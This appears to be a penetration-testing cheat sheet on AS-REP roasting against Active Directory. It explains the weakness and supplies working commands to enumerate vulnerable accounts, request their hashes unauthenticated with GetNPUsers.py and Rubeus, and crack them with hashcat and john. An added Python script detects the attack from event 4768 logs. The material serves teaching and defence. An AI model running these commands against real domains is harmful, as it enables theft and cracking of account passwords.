
AS-REP Roasting

Kerberos pre-authentication forces a client to prove they know the user's password before the KDC issues a TGT. When pre-auth is disabled (UF_DONT_REQUIRE_PREAUTH), the KDC returns an AS-REP encrypted with the user's hash to anyone who asks: no credentials required to grab it.

Why It Works

  • The AS-REP contains a blob encrypted with a key derived from the account's password (RC4-HMAC, etype 23, unless AES-only is enforced)
  • Without pre-auth, the KDC never verifies the requestor's identity before returning that blob
  • You only need to know the username, which makes this useful in unauthenticated scenarios where you have a user list
  • The blob can be cracked offline: hashcat mode 18200

Finding Vulnerable Accounts

Search for accounts with UF_DONT_REQUIRE_PREAUTH (UAC flag 0x400000) set.

```powershell
# PowerView
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | Select-Object samaccountname, description

# ActiveDirectory module: test the UAC bit directly
Get-ADUser -Filter * -Properties UserAccountControl |
  Where-Object { $_.UserAccountControl -band 0x400000 } |
  Select-Object Name, SamAccountName
```

```bash
# nxc: with creds
nxc ldap <ip> -u user -p pass --asreproast hashes.txt

# nxc: null session (only works if LDAP anonymous bind is allowed)
nxc ldap <ip> -u '' -p '' --asreproast hashes.txt

# BloodHound: use the built-in "Find AS-REP Roastable Users" query
```
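The two defender-side checks that follow from the sections above, as an added example that is not part of the original page: auditing userAccountControl values for the 0x400000 bit, and flagging event 4768 TGT requests that used no pre-authentication and an RC4 ticket (the AS-REPs that mode 18200 cracks). Field names follow the Windows Security 4768 event; the account list and log lines are constructed.

```python
import json

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit discussed above
ETYPE_RC4_HMAC = 0x17                # Kerberos encryption type 23 (RC4-HMAC)


def preauth_disabled(uac: int) -> bool:
    """True when the DONT_REQ_PREAUTH bit is set on a userAccountControl value."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def audit_accounts(accounts):
    """Return the sAMAccountNames whose UAC value has pre-auth disabled."""
    return [a["sam"] for a in accounts if preauth_disabled(a["uac"])]


def roastable_tgt_requests(events):
    """Flag successful 4768 events with PreAuthType 0 (no pre-auth) and an RC4 ticket."""
    hits = []
    for e in events:
        if e.get("EventID") != 4768:
            continue
        no_preauth = int(e.get("PreAuthType", -1)) == 0
        rc4 = int(e.get("TicketEncryptionType", "0x0"), 16) == ETYPE_RC4_HMAC
        if no_preauth and rc4 and e.get("Status") == "0x0":   # 0x0 = KDC issued the ticket
            hits.append((e["TargetUserName"], e["IpAddress"]))
    return hits


def load_events(jsonl: str):
    """Parse one JSON object per line (constructed stand-in for exported 4768 events)."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


# constructed sample data
SAMPLE_ACCOUNTS = [
    {"sam": "svc_backup", "uac": 0x400200},  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    {"sam": "jdoe", "uac": 0x200},           # NORMAL_ACCOUNT only
]
SAMPLE_EVENTS_JSONL = """\
{"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"}
{"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.21"}
{"EventID": 4768, "TargetUserName": "nobody", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x6", "IpAddress": "10.0.0.55"}
"""

if __name__ == "__main__":
    print("pre-auth disabled:", audit_accounts(SAMPLE_ACCOUNTS))
    print("suspicious AS-REPs:", roastable_tgt_requests(load_events(SAMPLE_EVENTS_JSONL)))
```

Status 0x6 (client principal unknown) is excluded because no ticket was issued, but a burst of those from one source is itself a sign of username enumeration and worth its own rule.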

Requesting Hashes

Get the AS-REP without cracking: works with or without valid credentials.

```bash
# Without credentials: requires a username list
GetNPUsers.py domain.local/ -dc-ip <ip> -no-pass -usersfile users.txt -format hashcat -outputfile hashes.txt

# With credentials: discovers accounts automatically via LDAP
GetNPUsers.py domain.local/user:pass -dc-ip <ip> -request -format hashcat -outputfile hashes.txt

# Request for a specific account
GetNPUsers.py domain.local/ -dc-ip <ip> -no-pass -usersfile single_user.txt -format hashcat
```

```powershell
# Rubeus: all AS-REP roastable accounts
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Rubeus: specific account
Rubeus.exe asreproast /user:target_user /format:hashcat /outfile:hashes.txt

# Rubeus: without existing TGT (unauthenticated)
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /domain:domain.local /dc:<dc-ip>
```

Cracking

```bash
# hashcat mode 18200
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for mangled passwords
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# john
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```